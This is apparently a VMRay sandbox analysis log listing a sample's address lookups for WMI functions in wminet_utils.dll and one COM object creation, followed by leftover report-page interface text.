Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image